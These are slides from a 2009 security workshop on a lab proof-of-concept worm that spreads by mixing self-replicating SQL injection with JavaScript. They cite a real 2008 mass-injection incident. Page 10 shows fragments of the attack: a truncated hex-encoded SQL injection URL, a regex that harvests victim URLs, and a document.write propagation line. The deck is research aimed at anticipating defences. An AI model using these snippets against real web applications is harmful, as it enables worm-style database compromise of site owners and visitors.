Page 1 - CONFIDENTIAL -

SQL/JavaScript Hybrid Worms

As Two-stage Quines

Workshop Seguridad Informática 2009 – 38 JAIIO (MDQ)

Lic. José Orlicki (jorlicki@)

August 26th, 2009

Page 2

Not-So-Secret Agenda

Motivation

Hybrid Scenario

Features Discussion

Proof of Concept Highlights

Demo&Discussion!?

Abstract: a what-if worm scenario based on

SQL/JS real incidents and prototype code,

leads to proof-of-concept on laboratory with

widely-deployed technologies (unhardened).

Helps anticipate future trends and protections.

- DECLASSIFIED -

Page 3 - CONFIDENTIAL -

Attacks in the Wild! (2008)

[..]Anyone know about www.nihaorr1.com/1.js? The db that

supports our companies ecommerce is lling up with this url[..]

[..]The script www.nihaorr1.com/1.js is getting inserted into every

record of my organizations SQL db. I'm the accidental techie in my

oce, and I'm clueless[..]

Huge Web Hack Attack Infects Many Pages Gregg Keizer,

Computerworld (nihaorr1 -> favorite search engine)

Page 4 - -

Protype of infected RFIDs! (2006)

Is Your Cat Infected with a Computer Virus? Melanie R. Rieback,

Bruno Crispo, Andrew S. Tanenbaum

SQL Virus Prototype propaging via RFID tags. (Virus != Worm?)

Uses SQL Quines, self-replicating statements.

Page 5 - CONFIDENTIAL -

SQL and JavaScript can

be combined in a Worm?

Page 6

Basic Quines in T-SQL and Javascript

Version 1: quine classic techniques in T-SQL

- NOT CONFIDENTIAL -

Page 7

Basic Quines in T-SQL and Javascript

Version 2: quine using native reflection hack in T-SQL

- NOT CONFIDENTIAL -

Page 8

Basic Quines in T-SQL and Javascript

Version 3 (fail!): quine classic and native getElementById()

techniques in SQL

Similar to Version 1 but on the JS/client-side

Similar to Version 2 but idem…

- NOT CONFIDENTIAL -

Page 9 - CONFIDENTIAL -

Proof of Concept

Lab:

1. CherryPy,

2. Two ad-hoc-vulnerable webapps in different domains,

3. MS-SQL.

4. Python SQL interface, no modifications.

Two-stage self-replication.

Targets VARCHAR and TEXT db fields, ALL TABLEs…

Version 1: MS-SQL Quines, JavaScript regexes to extract new

possibles victim URL, blind injection. (7359 bytes of SQLi egg)

Version 2: MS-SQL Reflective Features. (3000 bytes aprox, idem)

Version 3 (fail!): JavaScript quines and reflection worked,

complete worm don’t. (estimating 1500 bytes)

Page 10

Proof of Concept (cont.)

SQL Hex and URL Encoding: stealthness and SQLi correctness. 4-

variable (original, 1 variable, 2008) scattered egg

http://192.168.1.105:8081/greetUser?numid=1%3BDECLAR

E+@S+VARCHAR(MAX),@S2+VARCHAR(MAX),@S3+VARCHAR(MAX),

@S4+VARCHAR(MAX)%3BSET+@S=CAST(0x0d0a444398498468...

Regex matching for detecting possible new victim sites.

var regexp = new RegExp("[a-zA-Z0-9-.?_&=:\/]+\/[a-

zA-Z0-9-\.?_&=]+=[0-9]+","g");

var m = infected_html.match(regexp);

Javascript blind XSS for progapagation (very naive!)document.write(

"<img src="+NEW_VICTIM_URL+sql_egg+">“

);

- NOT CONFIDENTIAL -

Page 11 - CONFIDENTIAL -

¡Hybrid Worms Discussion!

Billy Hoffman and John Terrill. The Little

Hybrid Web Worm that Could, Black-Hat USA

2007. (they focus in JS obfuscation and Perl)

No choke point.

Stealthier infections.

More portability (interpreted lang?)

Target generic vulnerabilities (idem)

Easily obfuscated (idem)

Less crashes (idem)

Data/Web 2.0/Cloud centric?

Page 12

Demostration!?

...but I can only show you the door. You're the one that has to walk

through it...

Acknowledgements:

- Core Security Team: support and creative environment.

- Sebastián Cufre: T-SQL tricks.

- Aureliano Calvo: Javascript concepts.

- Pedro Varangot: suitable testing computer.

- DECLASSIFIED -

Page 13 - CONFIDENTIAL -

Questions?

Thanks!

Contact: